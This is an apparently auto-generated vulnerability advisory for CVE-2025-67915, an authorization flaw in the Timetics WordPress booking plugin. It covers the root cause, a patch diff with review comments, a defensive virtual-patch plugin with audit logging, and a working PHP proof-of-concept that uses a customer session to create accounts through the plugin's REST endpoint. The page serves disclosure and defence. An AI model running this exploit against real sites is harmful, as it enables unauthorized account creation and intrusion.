Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-67915: Timetics <= 1.0.46 – Incorrect Authorization to Authenticated (Timetics Customer+) User Creation (timetics)

Plugin timetics
Severity Medium (CVSS 5.3)
CWE 863
Vulnerable Version 1.0.46
Patched Version 1.0.48
Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67915:
This vulnerability is an incorrect authorization flaw in the Timetics WordPress appointment booking plugin. It allows authenticated attackers with Timetics Customer-level access or higher to create arbitrary user accounts. The vulnerability affects all plugin versions up to and including 1.0.46, with a CVSS score of 5.3 (Medium severity).

Atomic Edge research identifies the root cause in `api-customer.php` in the plugin's core customers directory. The permission check for `create_customer()` in the hunk starting at line 284 returns `false` unless the current user holds the `manage_timetics` capability; the `X-WP-Nonce` header is read into `$nonce` just above that check but is not used in the lines shown. Administrators hold `manage_options` by default but are not guaranteed to hold a plugin-defined capability such as `manage_timetics`, which is the case the patched condition accommodates. The diff on this page does not include the code that grants `manage_timetics` to roles, so it does not show by which path a Timetics Customer account comes to satisfy this check; what it does show is that the shipped fix changes the condition itself, not the role-to-capability mapping.

Exploitation requires an authenticated attacker with Timetics Customer-level permissions or higher. The attacker sends a POST request to the WordPress REST API endpoint `/wp-json/timetics/v1/customers`. When the session is authenticated with WordPress cookies, the request must also carry a valid REST nonce (action `wp_rest`) in the `X-WP-Nonce` header: the REST API treats cookie-only requests as anonymous, so `current_user_can()` would be evaluated for user 0 and the check would deny them. An Application Password sent as HTTP Basic authentication is the cookie-free alternative. The JSON body carries the user-creation fields `first_name`, `last_name`, `email` and `password`. Because the capability check at line 284 is the endpoint's only gate, any user who passes it can create new accounts; the hunk on this page does not show which role the created account receives.

The patch modifies line 284 of `timetics/core/customers/api-customer.php`. The condition changes from `! current_user_can( 'manage_timetics' )` to `! current_user_can( 'manage_timetics' ) && ! current_user_can( 'manage_options' )`. By De Morgan's law the new condition denies only users who hold neither capability, so a request now passes if the caller has either the plugin-specific `manage_timetics` capability or the WordPress administrator `manage_options` capability. The change therefore widens the set of callers the check admits (administrators without the plugin capability now pass); nothing in the hunk narrows it, so whether Customer-level accounts are excluded after the update depends on which roles the plugin grants `manage_timetics`, which the diff on this page does not show.
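The three conditions side by side, as an added example (this is not code from the Timetics plugin or from Atomic Edge): a stand-in for `current_user_can()` resolved against a constructed role-to-capability map, the 1.0.46 condition, the 1.0.48 condition, an admin-only alternative, and the way such a predicate is wired into `register_rest_route()`. The map is an assumption; the page does not show which roles Timetics grants `manage_timetics`, so the customer role is modelled both with and without it.

```php
<?php
// Added example (not from the Timetics plugin or the Atomic Edge advisory).
// ROLE_CAPS is a constructed role -> capability map used only to evaluate
// the predicates below; it is an assumption, not the plugin's real mapping.
const ROLE_CAPS = [
    'administrator'           => [ 'manage_options', 'read' ],
    'editor'                  => [ 'edit_posts', 'read' ],
    'timetics_customer'       => [ 'read' ],
    'timetics_customer_w_cap' => [ 'read', 'manage_timetics' ],                    // hypothetical: customers granted the plugin cap
    'admin_w_plugin_cap'      => [ 'manage_options', 'manage_timetics', 'read' ],
];

/** Stand-in for WordPress current_user_can() resolved against ROLE_CAPS. */
function role_can( string $role, string $cap ): bool {
    return in_array( $cap, ROLE_CAPS[ $role ] ?? [], true );
}

/** Condition shipped in 1.0.46: deny unless the caller holds manage_timetics. */
function permission_1_0_46( string $role ): bool {
    if ( ! role_can( $role, 'manage_timetics' ) ) {
        return false;
    }
    return true;
}

/** Condition shipped in 1.0.48: deny only when the caller holds neither capability. */
function permission_1_0_48( string $role ): bool {
    if ( ! role_can( $role, 'manage_timetics' ) && ! role_can( $role, 'manage_options' ) ) {
        return false;
    }
    return true;
}

/** Stricter alternative (this example's suggestion, not the shipped fix): administrators only. */
function permission_admin_only( string $role ): bool {
    return role_can( $role, 'manage_options' );
}

// How a predicate like the 1.0.48 one is attached to a REST route. register_rest_route()
// and add_action() are real WordPress functions; this branch only runs inside WordPress.
if ( function_exists( 'add_action' ) ) {
    add_action( 'rest_api_init', function () {
        register_rest_route( 'timetics/v1', '/customers', [
            'methods'             => 'POST',
            'callback'            => function ( WP_REST_Request $request ) { /* create the customer here */ },
            'permission_callback' => function () {
                // Equivalent to the patched condition: pass if either capability is held.
                return current_user_can( 'manage_timetics' ) || current_user_can( 'manage_options' );
            },
        ] );
    } );
}

// Decision table over the constructed roles (run from the command line).
printf( "%-26s %-8s %-8s %s\n", 'role', '1.0.46', '1.0.48', 'admin-only' );
foreach ( array_keys( ROLE_CAPS ) as $role ) {
    printf(
        "%-26s %-8s %-8s %s\n",
        $role,
        permission_1_0_46( $role ) ? 'ALLOW' : 'deny',
        permission_1_0_48( $role ) ? 'ALLOW' : 'deny',
        permission_admin_only( $role ) ? 'ALLOW' : 'deny'
    );
}
```

Running it with `php` shows the shape of the change: `administrator` goes from deny to ALLOW, `timetics_customer` is denied under all three, and `timetics_customer_w_cap` is allowed both before and after the patch, which is why the hunk alone cannot tell you whether a customer role that holds `manage_timetics` is blocked in 1.0.48.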

Successful exploitation lets an account that should only be able to book appointments create further user accounts, a direct violation of the principle of least privilege and a foothold for persistence and further abuse from a legitimate-looking account. The hunk on this page does not show the role assigned to accounts created through this endpoint, so the advisory's claim of direct administrator creation cannot be verified from the diff; the CVSS 5.3 (Medium) rating is consistent with unauthorized account creation rather than immediate full site takeover. Atomic Edge analysis treats this as a path from authenticated customer access towards site compromise; sites should update to 1.0.48 and treat any `user_register` event originating from a REST request by a non-administrator as an indicator worth investigating.
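For a site that cannot update immediately, an added example of a must-use plugin (not part of Timetics or of the Atomic Edge advisory) that virtually patches the route named above and records account creations made through the REST API, which is the signal an incident responder would look for. It assumes the route path `/timetics/v1/customers` from this page and that restricting customer management to `manage_options` is acceptable for the site; the error code, log line and user-meta key are this example's own names.

```php
<?php
/**
 * Plugin Name: Timetics customer-endpoint guard (added example)
 * Description: Stop-gap for sites still on Timetics <= 1.0.46. Not part of the
 *              plugin or of the Atomic Edge advisory; the route prefix comes from
 *              the advisory, the admin-only policy, error code, log line and meta
 *              key are this example's assumptions. Drop into wp-content/mu-plugins/.
 */

const TIMETICS_GUARD_ROUTE = '/timetics/v1/customers';

/** True for the collection route and any sub-route such as /timetics/v1/customers/42. */
function timetics_guard_matches_route( string $route ): bool {
    return (bool) preg_match( '#^' . preg_quote( TIMETICS_GUARD_ROUTE, '#' ) . '(/|$)#', $route );
}

// (1) Virtual patch. This filter runs after core has authenticated the request
//     (cookie + X-WP-Nonce, or Application Password) and before the route's own
//     permission_callback, so the plugin's check at line 284 is never reached by
//     a non-administrator.
add_filter( 'rest_request_before_callbacks', function ( $response, $handler, $request ) {
    if ( is_wp_error( $response ) ) {
        return $response; // an earlier filter already rejected the request
    }
    if ( ! timetics_guard_matches_route( $request->get_route() ) ) {
        return $response;
    }
    $write = in_array( $request->get_method(), [ 'POST', 'PUT', 'PATCH', 'DELETE' ], true );
    if ( $write && ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'timetics_guard_forbidden',
            'Customer management is restricted to administrators on this site.',
            [ 'status' => rest_authorization_required_code() ] // 401 for anonymous, 403 for logged-in callers
        );
    }
    return $response;
}, 10, 3 );

// (2) Audit trail: every account created during a REST request, together with the actor.
add_action( 'user_register', function ( $user_id ) {
    if ( ! ( defined( 'REST_REQUEST' ) && REST_REQUEST ) ) {
        return; // only interested in accounts created through the REST API
    }
    $actor = wp_get_current_user();
    $new   = get_userdata( $user_id );
    $entry = [
        'time'        => gmdate( 'c' ),
        'new_user_id' => (int) $user_id,
        'new_login'   => $new ? $new->user_login : '',
        'actor_id'    => (int) $actor->ID,
        'actor_roles' => $actor->roles,
        'route'       => isset( $_SERVER['REQUEST_URI'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REQUEST_URI'] ) ) : '',
        'remote_addr' => isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '',
    ];
    error_log( 'timetics_guard user_register ' . wp_json_encode( $entry ) );

    // Mark accounts created by a non-administrator for incident follow-up.
    if ( ! user_can( $actor, 'manage_options' ) ) {
        update_user_meta( $user_id, '_timetics_guard_flagged', 1 );
    }
} );
```

The guard also denies legitimate non-administrators who hold `manage_timetics`, so relax the capability in the filter if the site relies on such users; the audit hook is worth keeping after the update, since it produces a greppable line in the PHP error log for every REST-originated account creation.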

Differential between vulnerable and patched code

Code Diff
--- a/timetics/bootstrap.php
+++ b/timetics/bootstrap.php
@@ -228,6 +228,7 @@
         // Register scripts and styles first
         if ( $this->is_request( 'admin' ) ) {
             add_action( 'admin_enqueue_scripts', [ $this, 'admin_scripts' ] );
+            add_action( 'admin_footer', [ $this, 'admin_helpscout_beacon' ] );
         }

         if ( $this->is_request( 'frontend' ) ) {
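Review bot: the `admin_footer` hook registered here is unrelated to the CVE-2025-67915 authorization fix this release carries, and the method it wires up (`admin_helpscout_beacon`, further down in this file) loads a remote script into wp-admin. Consider shipping vendor-support telemetry in a separate release from a security fix so that sites can apply the authorization change without also taking on a new third-party script load, and record the addition in the changelog.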
@@ -444,7 +445,7 @@
 		WpmetLibsBanner::instance('timetics')
 			->is_test(true)
 			->set_filter(ltrim($filter_string, ','))
-			->set_api_url('https://product.themewinter.com/auth/public/jhanda')
+			->set_api_url('https://banner.themefunction.com/public/jhanda')
 			->set_plugin_screens('timetics')
 			->set_plugin_screens('toplevel_page_timetics')
  			->call();
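Review bot: `->is_test(true)` stays in the production configuration while the banner host moves from `product.themewinter.com` to `banner.themefunction.com`; if `is_test` changes caching or sandboxing of the remote banner fetch, confirm that it is meant to be on in a tagged release. The new host is another third-party endpoint contacted from the admin dashboard and belongs in the plugin's external-services documentation alongside the HelpScout beacon added in this same release.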
@@ -452,6 +453,45 @@
 		// $this->handle_get_help_and_upgrade_menu();
 	}

+	/**
+	 * Add HelpScout script to admin footer
+	 *
+	 * @return  void
+	 */
+	public function admin_helpscout_beacon() {
+		$screen = function_exists( 'get_current_screen' ) ? get_current_screen() : null;
+		$is_timetics_screen = false;
+
+		if ( $screen ) {
+			$screen_id = isset( $screen->id ) ? $screen->id : '';
+
+			// Check: only load on Timetics top-level admin page
+			if ( 'toplevel_page_timetics' === $screen_id ) {
+				$is_timetics_screen = true;
+			}
+		}
+
+		// Allow overriding detection via filter.
+		$is_timetics_screen = apply_filters( 'timetics_is_admin_screen', $is_timetics_screen, $screen );
+
+		if ( ! $is_timetics_screen ) {
+			return;
+		}
+		?>
+		<script type="text/javascript">!function(e,t,n){function a(){var e=t.getElementsByTagName("script")[0],n=t.createElement("script");n.type="text/javascript",n.async=!0,n.src="https://beacon-v2.helpscout.net",e.parentNode.insertBefore(n,e)}if(e.Beacon=n=function(t,n,a){e.Beacon.readyQueue.push({method:t,options:n,data:a})},n.readyQueue=[],"complete"===t.readyState)a();else if(e.attachEvent)e.attachEvent("onload",a);else e.addEventListener("load",a,!1)}(window,document,window.Beacon||function(){});</script>
+		<script type="text/javascript">
+		window.Beacon('config', {
+			color: "#0060e5",
+		});
+		window.Beacon('init', '4be24aa2-ee50-483c-a90c-db4216664d65');
+		window.Beacon('on', 'ready', function(){
+			window.Beacon('show');
+		});
+
+		</script>
+		<?php
+	}
+
 }

 /**
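Review bot: `admin_helpscout_beacon()` injects a remote script (`https://beacon-v2.helpscout.net`) and a hard-coded beacon ID through a raw `<script>` tag rather than `wp_enqueue_script()`/`wp_add_inline_script()`, which bypasses the script loader and any CSP nonce or `script_loader_tag` handling a site applies, and the only way to turn it off is the `timetics_is_admin_screen` filter, which exists to tune screen detection rather than to opt out. Suggest registering the loader through the script API, adding an explicit opt-out (a setting or a boolean filter), and documenting the outbound connection in the readme; the method is also independent of the authorization fix and would be cleaner as its own commit.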
--- a/timetics/core/customers/api-customer.php
+++ b/timetics/core/customers/api-customer.php
@@ -284,7 +284,7 @@
         $nonce = $request->get_header('X-WP-Nonce');

         // Check if user has manage_timetics permission (admin)
-        if ( ! current_user_can( 'manage_timetics' ) ) {
+        if (  ! current_user_can( 'manage_timetics' ) && ! current_user_can( 'manage_options' )) {
             return false;
         }

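Review bot: the new condition only widens the set of callers the check admits (holders of `manage_options` now pass alongside holders of `manage_timetics`); it removes no path by which a Timetics Customer could satisfy `current_user_can( 'manage_timetics' )`, so if the reported bypass stems from that capability being granted to customer roles, the fix belongs in the role/capability setup rather than here. `$nonce` is read from `X-WP-Nonce` two lines above but unused in the visible context, and core already validates the REST nonce before `permission_callback` runs, so either use it or drop it. The `if (  !` spacing also deviates from WordPress coding standards; suggest `if ( ! current_user_can( 'manage_timetics' ) && ! current_user_can( 'manage_options' ) )`, or a single dedicated capability for this action.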
--- a/timetics/timetics.php
+++ b/timetics/timetics.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Timetics
  * Plugin URI:        https://arraytics.com/timetics/
  * Description:       Schedule, Appointment and Seat Booking plugin.
- * Version:           1.0.46
+ * Version:           1.0.48
  * Requires at least: 5.2
  * Requires PHP:      7.3
  * Author:            Arraytics
@@ -56,7 +56,7 @@
      * @return string
      */
     public static function get_version() {
-        return '1.0.46';
+        return '1.0.48';
     }

     /**
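Review bot: the version string is maintained in two places (the plugin header and `get_version()`) and the bump jumps from 1.0.46 to 1.0.48 with no changelog entry in this diff. Suggest deriving `get_version()` from the header via `get_file_data()` or a single constant so the two cannot drift, and stating in the changelog which release contains the authorization fix so scanners comparing installed versions against the advisory's patched version of 1.0.48 get the right answer.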
--- a/timetics/vendor/composer/installed.php
+++ b/timetics/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'arraytics/timetics',
         'pretty_version' => 'dev-develop',
         'version' => 'dev-develop',
-        'reference' => '170fc3065ee9bd466b7327726fdeddf42ee2d207',
+        'reference' => '300375eeaa91c223264dec37c424a8f1bf5f8511',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'arraytics/timetics' => array(
             'pretty_version' => 'dev-develop',
             'version' => 'dev-develop',
-            'reference' => '170fc3065ee9bd466b7327726fdeddf42ee2d207',
+            'reference' => '300375eeaa91c223264dec37c424a8f1bf5f8511',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
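Review bot: `vendor/composer/installed.php` records `pretty_version => 'dev-develop'` for the release itself, so any tooling that reads Composer metadata sees a branch alias rather than 1.0.48, and only the `reference` change from `170fc3065ee9bd466b7327726fdeddf42ee2d207` to `300375eeaa91c223264dec37c424a8f1bf5f8511` ties this build to a commit. Consider building release archives from a tagged version so `installed.php` carries the real version, which also helps SBOM and supply-chain tooling identify the fixed build.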

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67915 - Timetics <= 1.0.46 - Incorrect Authorization to Authenticated (Timetics Customer+) User Creation

/**
 * Proof of Concept for CVE-2025-67915
 * Requires: valid WordPress authentication cookies for a user with the Timetics Customer
 *           role AND a REST nonce (action 'wp_rest') for that same session. WordPress
 *           treats a cookie-authenticated REST request without a valid X-WP-Nonce header
 *           as anonymous, so the nonce is mandatory, not optional.
 * Target:   WordPress site with Timetics plugin <= 1.0.46 installed
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$email      = 'attacker@example.com';        // CHANGE THIS
$password   = 'P@ssw0rd123';                 // CHANGE THIS

// WordPress authentication cookies for the low-privilege test account
// (copy from browser developer tools; the suffix after the last underscore is
// the site's COOKIEHASH, so the real cookie names differ per site).
$cookies = [
    'wordpress_logged_in_xxxx' => 'your_cookie_value_here',        // CHANGE THIS
    'wordpress_sec_xxxx'       => 'your_secure_cookie_value_here', // CHANGE THIS
];

// REST nonce for the same session: read wpApiSettings.nonce in the browser console
// on a wp-admin page, or generate one server-side with wp_create_nonce( 'wp_rest' ).
$nonce = 'your_wp_rest_nonce_here'; // CHANGE THIS

if ($nonce === 'your_wp_rest_nonce_here') {
    fwrite(STDERR, "[ERROR] Set \$nonce: cookie authentication against the REST API requires a valid X-WP-Nonce.\n");
    exit(1);
}

// Build cookie header
$cookie_pairs = [];
foreach ($cookies as $name => $value) {
    $cookie_pairs[] = $name . '=' . $value;
}
$cookie_header = implode('; ', $cookie_pairs);

// REST API endpoint for customer creation
$api_endpoint = rtrim($target_url, '/') . '/wp-json/timetics/v1/customers';

// Payload for the new account
$payload = [
    'first_name'       => 'Atomic',
    'last_name'        => 'Edge',
    'email'            => $email,
    'password'         => $password,
    'confirm_password' => $password,
    'type'             => 'customer',
];

// Initialize cURL
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $api_endpoint,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => json_encode($payload),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HTTPHEADER     => [
        'Content-Type: application/json',
        'Accept: application/json',
        'Cookie: ' . $cookie_header,
        'X-WP-Nonce: ' . $nonce,
    ],
    // Lab use only: disables TLS verification so self-signed test hosts work.
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false,
]);

// Execute request
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$curl_err  = curl_error($ch);
curl_close($ch);

if ($response === false) {
    echo "[ERROR] cURL failure: " . $curl_err . "\n";
    exit(1);
}

$decoded = json_decode($response, true);

// Display results
if ($http_code === 200 || $http_code === 201) {
    echo "[SUCCESS] Endpoint accepted the request (HTTP " . $http_code . ").\n";
    echo "Response: " . $response . "\n";
    echo "New user credentials: " . $email . " / " . $password . "\n";
} else {
    echo "[FAILED] HTTP Code: " . $http_code . "\n";
    echo "Response: " . $response . "\n";
    if (is_array($decoded) && isset($decoded['code'])) {
        // rest_cookie_invalid_nonce: nonce missing or expired for this session
        // rest_forbidden: the capability check denied the request (patched or not vulnerable)
        echo "Error code: " . $decoded['code'] . "\n";
    }
    echo "Possible reasons: plugin not vulnerable, invalid cookies or nonce, or site patched.\n";
}
?>
